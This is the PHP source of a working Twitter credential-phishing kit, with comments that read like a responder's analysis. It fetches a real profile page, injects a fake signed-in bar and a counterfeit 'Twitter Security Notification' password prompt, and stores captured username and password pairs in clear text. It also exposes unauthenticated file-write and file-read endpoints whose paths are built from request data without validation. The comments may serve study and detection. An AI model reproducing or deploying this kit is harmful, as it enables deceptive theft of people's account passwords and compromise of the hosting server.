- <?php
- // Debug configuration left switched on: every PHP error is rendered into the
- // HTTP response and is also appended to "error.log". The log path is relative,
- // so the file is created wherever the script runs. For responders,
- // "error.log" is one of the files this script can leave behind on a host.
- ini_set('display_errors', 1);
- ini_set('display_startup_errors', 1);
- error_reporting(E_ALL);
- ini_set("log_errors", 1);
- ini_set("error_log", "error.log");
- // $topbar: static markup for a Twitter-branded navigation bar in its
- // signed-in form (Home / Notifications / Messages, search box, account
- // dropdown, Tweet button). Its only use in this listing is the "generate"
- // handler, which turns each line into a JavaScript `template += '...';`
- // statement so the browser can swap it in for the fetched page's top bar.
- // The {{USERNAME}} and {{NAME}} placeholders are not substituted anywhere
- // in this listing.
- $topbar = <<<TOPBAR
- <div class="ProfilePage-editingOverlay"></div>
- <div class="global-nav" data-section-term="top_nav">
- <div class="global-nav-inner">
- <div class="container">
- <h1 class="Icon Icon--bird bird-topbar-etched" style="display: inline-block; width: 24px; height: 21px;">
- <span class="visuallyhidden">Twitter</span>
- </h1><div class="pushstate-spinner"></div>
- <div role="navigation" style="display: inline-block;"><ul class="nav js-global-actions" id="global-actions"><li id="global-nav-home" class="home" data-global-action="home">
- <a class="js-nav js-tooltip js-dynamic-tooltip" data-placement="bottom" href="/" data-component-context="home_nav" data-nav="home" data-original-title="">
- <span class="Icon Icon--home Icon--large"></span>
- <span class="text">Home</span>
- </a>
- </li><li class="people notifications" data-global-action="connect">
- <a class="js-nav js-tooltip js-dynamic-tooltip" data-placement="bottom" href="/i/notifications" data-component-context="connect_nav" data-nav="connect" data-original-title="">
- <span class="Icon Icon--notifications Icon--large"></span>
- <span class="text">Notifications</span>
- <span class="count">
- <span class="count-inner">0</span>
- </span>
- </a>
- </li><li class="dm-nav">
- <a role="button" href="#" class="js-tooltip js-dynamic-tooltip global-dm-nav" data-placement="bottom" data-original-title="">
- <span class="Icon Icon--dm Icon--large"></span>
- <span class="text">Messages</span>
- <span class="dm-new"><span class="count-inner"></span></span>
- </a>
- </li></ul>
- </div>
- <div class="pull-right" style="display: inline-block;"><div role="search">
- <form class="t1-form form-search js-search-form" action="/search" id="global-nav-search">
- <label class="visuallyhidden" for="search-query">Search query</label>
- <input class="search-input" type="text" id="search-query" placeholder="Search Twitter" name="q" autocomplete="off" spellcheck="false" aria-autocomplete="list" aria-expanded="false" aria-owns="typeahead-dropdown-1">
- <span class="search-icon js-search-action">
- <button type="submit" class="Icon Icon--search nav-search" tabindex="-1">
- <span class="visuallyhidden">Search Twitter</span>
- </button>
- </span>
- <div role="listbox" class="dropdown-menu typeahead" id="typeahead-dropdown-1">
- <div aria-hidden="true" class="dropdown-caret">
- <div class="caret-outer"></div>
- <div class="caret-inner"></div>
- </div>
- <div role="presentation" class="dropdown-inner js-typeahead-results"><div role="presentation" class="typeahead-recent-searches block0">
- <h3 id="recent-searches-heading" class="typeahead-category-title recent-searches-title">Recent searches</h3><button type="button" tabindex="-1" class="btn-link clear-recent-searches">Clear All</button>
- <ul role="presentation" class="typeahead-items recent-searches-list">
- <li role="presentation" class="typeahead-item typeahead-recent-search-item">
- <span class="Icon Icon--close" aria-hidden="true"><span class="visuallyhidden">Remove</span></span>
- <a role="option" aria-describedby="recent-searches-heading" class="js-nav" href="" data-search-query="" data-query-source="" data-ds="recent_search" tabindex="-1"></a>
- </li>
- </ul>
- </div><div role="presentation" class="typeahead-saved-searches block1">
- <h3 id="saved-searches-heading" class="typeahead-category-title saved-searches-title">Saved searches</h3>
- <ul role="presentation" class="typeahead-items saved-searches-list">
- <li role="presentation" class="typeahead-item typeahead-saved-search-item">
- <span class="Icon Icon--close" aria-hidden="true"><span class="visuallyhidden">Remove</span></span>
- <a role="option" aria-describedby="saved-searches-heading" class="js-nav" href="" data-search-query="" data-query-source="" data-ds="saved_search" tabindex="-1"></a>
- </li>
- </ul>
- </div><ul role="presentation" class="typeahead-items typeahead-topics block2" style="display: none;">
- <li role="presentation" class="typeahead-item typeahead-topic-item">
- <a role="option" class="js-nav" href="" data-search-query="" data-query-source="typeahead_click" data-ds="topics" tabindex="-1">
- </a>
- </li>
- </ul><ul role="presentation" class="typeahead-items typeahead-accounts social-context js-typeahead-accounts block3" style="display: none;">
- <li role="presentation" data-user-id="" data-user-screenname="" data-remote="true" data-score="" class="typeahead-item typeahead-account-item js-selectable">
- <a role="option" class="js-nav" data-query-source="typeahead_click" data-search-query="" data-ds="account">
- <img class="avatar size32" alt="">
- <span class="typeahead-user-item-info">
- <span class="fullname"></span>
- <span class="js-verified hidden"><span class="Icon Icon--verified Icon--small">
- <span class="u-hiddenVisually">Verified account</span>
- </span></span>
- <span class="username"><s>@</s><b></b></span>
- </span>
- <span class="typeahead-social-context"></span>
- </a>
- </li>
- <li role="presentation" class="js-selectable typeahead-accounts-shortcut js-shortcut"><a role="option" class="js-nav" href="" data-search-query="" data-query-source="typeahead_click" data-shortcut="true" data-ds="account_search"></a></li>
- </ul></div>
- </div>
- </form>
- </div>
- <ul class="nav right-actions"><li class="me dropdown session js-session" data-global-action="t1me" id="user-dropdown">
- <a href="/settings/account" class="btn js-tooltip settings dropdown-toggle js-dropdown-toggle" id="user-dropdown-toggle" title="Profile and settings" data-placement="bottom" role="button" aria-haspopup="true">
- <img class="avatar size32" src="" alt="Profile and settings" data-user-id="">
- </a>
- <div class="dropdown-menu">
- <div class="dropdown-caret">
- <span class="caret-outer"></span>
- <span class="caret-inner"></span>
- </div>
- <ul>
- <li class="current-user" data-name="profile">
- <a href="/{{USERNAME}}" class="account-summary account-summary-small js-nav" data-nav="view_profile">
- <div class="content">
- <div class="account-group js-mini-current-user" data-user-id="" data-screen-name="{{NAME}}">
- <b class="fullname">{{NAME}}</b>
- <span class="screen-name hidden" dir="ltr">@{{USERNAME}}</span>
- <small class="metadata">View profile</small>
- </div>
- </div>
- </a>
- </li>
- <li class="dropdown-divider"></li>
- <li data-name="lists">
- <a href="/{{USERNAME}}/lists" data-nav="all_lists">Lists</a>
- </li>
- <li class="dropdown-divider"></li>
- <li><a href="//support.twitter.com" data-nav="help_center">Help</a></li>
- <li class="js-keyboard-shortcut-trigger" data-nav="shortcuts">
- <button type="button" class="dropdown-link">Keyboard shortcuts</button>
- </li>
- <li class="dropdown-divider"></li>
- <li><a href="/settings/account" data-nav="settings" class="js-nav">Settings</a></li>
- <li class="js-signout-button" id="signout-button" data-nav="logout">
- <button type="button" class="dropdown-link">Log out</button>
- <form class="t1-form dropdown-link-form signout-form" id="signout-form" action="/logout" method="POST">
- <input type="hidden" value="" name="authenticity_token" class="authenticity_token">
- <input type="hidden" name="reliability_event" class="js-reliability-event">
- <input type="hidden" name="scribe_log">
- </form>
- </li>
- </ul>
- </div>
- </li><li role="complementary" aria-labelledby="global-new-tweet-button" class="topbar-tweet-btn">
- <button id="global-new-tweet-button" type="button" class="js-global-new-tweet js-tooltip btn primary-btn tweet-btn js-dynamic-tooltip" data-placement="bottom" data-component-context="new_tweet_button">
- <span class="Icon Icon--tweet Icon--large"></span>
- <span class="text">Tweet</span>
- </button>
- </li></ul></div>
- </div>
- </div>
- </div>
- TOPBAR;
- // $modal: the credential prompt. It renders a dialog titled "Twitter Security
- // Notification" that claims the visitor was logged out and asks for the
- // password again. The password field (#auth_password) and the submit button
- // (#save_password) are the elements the injected script reads and binds to.
- // The "generate" handler appends this markup after the fetched page.
- $modal = <<<modal
- <div id="password_dialog" class="modal-container" style="display: block;">
- <div class="close-modal-background-target"></div>
- <div class="modal modal-small draggable" role="dialog" aria-labelledby="password_dialog-header" style="top:250px;left:35%;" >
- <div class="modal-content" role="document">
- <div class="modal-header">
- <h3 class="modal-title" id="password_dialog-header">Twitter Security Notification</h3>
- </div>
- <div class="modal-body">
- <p>You have been logged out for verification purposes, please re-enter your password.</p>
- <div class="input-wrapper password-wrapper">
- <input class="input-block" id="auth_password" name="auth_password" type="password" placeholder="Password" autocomplete="off">
- <small>
- <a href="/account/access_password_reset" id="forgot_password" class="js-static-forgot-password">Forgot your password?</a>
- </small>
- </div>
- </div>
- <div class="modal-footer">
- <button type="button" class="btn js-close" id="cancel_password_button">Cancel</button>
- <button type="submit" id="save_password" class="btn primary-btn modal-submit">Save changes</button>
- </div>
- </div>
- <button type="button" class="modal-btn modal-close js-close" aria-controls="password_dialog-dialog">
- <span class="Icon Icon--close Icon--medium">
- <span class="visuallyhidden">Close</span>
- </span>
- </button><div class="js-last-tabstop" tabindex="0"></div></div>
- </div>
- modal;
- // Debug helper: dumps a value with print_r() wrapped in <pre> tags. Its only
- // reference in this listing is the commented-out call in the "login" handler.
- function r($var){
- echo '<pre>';
- print_r($var);
- echo '</pre>';
- }
- // First-run setup: when "d" does not exist, creates "d" and "d/l" relative to
- // the working directory. Mode 0777 requests world-writable directories (the
- // effective mode still depends on the process umask). "d/l" is where the
- // "create" handler stores page snapshots. The mkdir() results are not checked.
- if (!file_exists("d")) {
- mkdir("d", 0777);
- mkdir("d/l", 0777);
- }
- // Records a request that did not follow the expected flow, then ends the
- // script. The handlers below call it when a required parameter is missing.
- // One line is appended to the file "attack_326": date (day resolution only),
- // host and URI, client IP and User-Agent. The header values are written as
- // received, without escaping, so log lines may contain client-chosen text.
- // For responders, "attack_326" is another file this script leaves on a host.
- function exit_and_log(){
- $ip = $_SERVER['REMOTE_ADDR'];
- $agent = $_SERVER['HTTP_USER_AGENT'];
- $host = $_SERVER['HTTP_HOST'];
- $uri = $_SERVER['REQUEST_URI'];
- $time = date('Y-m-d');
- $logged = $time . "\t" . $host . "/". $uri . " \t-> ". $ip . "::". $agent . "\n";
- file_put_contents("attack_326", $logged, FILE_APPEND | LOCK_EX);
- exit();
- }
- // Every request must carry a "c" (command) query parameter. Without it the
- // script ends silently, so a bare visit to the URL returns an empty response.
- if(!isset($_GET["c"])){
- exit();
- }
- // "login" command: the credential sink. A POST without a "redirect" field is
- // logged via exit_and_log(). Otherwise the submitted "user" and "pass" values
- // are appended in clear text, as "user:pass", to the file "fdj5432zHDsgdADS",
- // and the redirect value is stored in a cookie named "posted", which the
- // injected script reads to send the visitor onwards.
- // Indicators visible here: the file name above, the "posted" cookie, and
- // POST requests to ?c=login carrying user / pass / redirect fields.
- if($_GET['c'] == "login"){
- if(!isset($_POST["redirect"])){
- exit_and_log();
- }
- //r($_POST["user"] . $_POST["pass"]);
- file_put_contents("fdj5432zHDsgdADS", $_POST["user"].":".$_POST["pass"] . "\n", FILE_APPEND | LOCK_EX);
- setcookie("posted", $_POST["redirect"]);
- }
- // "create" command: stores the POSTed "html" body as d/l/<user>. The request
- // is not authenticated and the file name is built from request data without
- // validation, so this endpoint is a risk to the hosting server in its own
- // right, independent of the lure. Files under "d/l" are artefacts of this kit.
- if($_GET['c'] == "create"){
- file_put_contents("d/l/".$_POST["user"], $_POST["html"], LOCK_EX);
- }
- // "view" command: returns a stored snapshot from d/l/<name> verbatim. A
- // request without "name" is logged via exit_and_log(). The path is built from
- // request data without validation and the file content is emitted unescaped.
- // A missing file produces no output.
- if($_GET['c'] == "view"){
- if(!isset($_GET["name"])){
- exit_and_log();
- }
- if(file_exists('d/l/'.$_GET["name"])){
- print file_get_contents('d/l/'.$_GET["name"]);
- }
- }
- // "generate" command: builds the lure page. It requires "name" (the profile
- // to imitate) and "redirect" (where the visitor is sent afterwards). A
- // request missing either one is logged via exit_and_log().
- if($_GET['c'] == "generate"){
- if(!isset($_GET["name"])){
- exit_and_log();
- }
- if(!isset($_GET["redirect"])){
- exit_and_log();
- }
- $redirect = $_GET["redirect"];
- // Server-side fetch of the named profile page over plain HTTP, following
- // redirects. The request is made by the hosting server, not by the visitor.
- // No timeout is set and the curl_exec() result is not checked.
- $curl = curl_init();
- curl_setopt ($curl, CURLOPT_URL, "http://www.twitter.com/". $_GET["name"] . "?lang=en");
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
- $result = curl_exec ($curl);
- curl_close ($curl);
- // Wrap each $topbar line in a JavaScript `template += '...';` statement so
- // the signed-in navigation bar can be rebuilt inside the browser.
- $etopbar = explode("\n", $topbar);
- foreach ($etopbar as &$value) {
- $value = 'template += \''. $value . '\';';
- }
- $etopbar = implode("\n", $etopbar);
- // Script injected into the fetched page. As written it:
- //  * re-pushes history state on every popstate event, so the Back button
- //    stays on this page;
- //  * if the "posted" cookie is set, goes straight to the stored redirect;
- //  * otherwise, after 2 s, on a page whose <body> class lacks "logged-in":
- //    swaps in the signed-in top bar, copies the profile avatar into it,
- //    removes the cookie notice and, 1 s later, uploads the whole DOM to
- //    index.php?c=create;
- //  * on a page whose <body> already has "logged-in": binds #save_password to
- //    POST the typed password and the profile link to /tw/index.php?c=login,
- //    then navigates to the redirect target.
- // $redirect is interpolated into the script text without escaping.
- // Request patterns for log review: index.php?c=generate, index.php?c=create
- // and /tw/index.php?c=login.
- $js = <<<JS
- <script>
- function getUrlVars() {
- var vars = {};
- var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi,
- function(m,key,value) {
- vars[key] = value;
- });
- return vars;
- }
- function getCookie(name) {
- var value = "; " + document.cookie;
- var parts = value.split("; " + name + "=");
- if (parts.length == 2) {
- return parts.pop().split(";").shift();
- }else {
- return false;
- }
- }
- (function(){
- history.pushState(null, null, location);
- window.addEventListener('popstate', function(event) {
- history.pushState(null, null, location);
- });
- })();
- (function(){
- console.log("sup");
- var template = "";
- $etopbar
- if(!getCookie("posted")){
- setTimeout(function(){
- if(jQuery('body').attr('class').indexOf("logged-in") == -1 ){
- jQuery('.topbar').html(template);
- $('body').removeClass('logged-out').addClass('logged-in');
- $('body').addClass('modal-enabled');
- var img_url = jQuery(".ProfileAvatar-image").attr('src');
- console.log('img_url '+ img_url);
- jQuery('.avatar.size32').attr('src', img_url);
- jQuery('.eu-cookie-notice').remove();
- setTimeout(function(){
- jQuery.ajax({
- url: "index.php?c=create",
- method:"POST",
- data: {
- html : document.documentElement.outerHTML,
- user:getUrlVars().name
- },
- }).done(function() {
- console.log("done");
- });
- }, 1000);
- }else {
- $("#save_password").click(function(e){
- var _pass, _usr, _redirect;
- _pass = jQuery('#auth_password').val();
- _usr = jQuery('.js-user-profile-link').attr('href')
- _redirect = "$redirect";
- jQuery.ajax({
- url: "/tw/index.php?c=login",
- method:"POST",
- data: {
- user :_usr,
- pass:_pass,
- redirect:_redirect,
- }
- }).done(function(){
- console.log("saved");
- console.log("redirection "+ _redirect);
- window.location.href = decodeURIComponent(_redirect);
- });
- })
- }
- }, 2000);
- } else {
- window.location.href = decodeURIComponent(getCookie("posted"));
- }
- })()
- </script>
- JS;
- // Response body = fetched Twitter page + injected script + password dialog.
- print $result . $js . $modal;
- }
- ?>